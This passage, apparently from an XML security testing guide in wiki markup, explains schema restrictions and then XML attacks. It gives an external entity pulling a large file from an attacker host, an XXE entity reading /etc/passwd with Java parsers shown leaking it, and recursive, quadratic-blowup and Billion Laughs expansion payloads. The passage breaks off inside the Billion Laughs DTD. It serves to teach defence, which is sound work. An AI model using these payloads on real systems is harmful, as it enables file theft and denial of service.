 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileReader;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    FileReader fr = new FileReader(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    int eventType = xmlfer.getEventType();&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     eventType = xmlfer.next(); &lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    fr.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
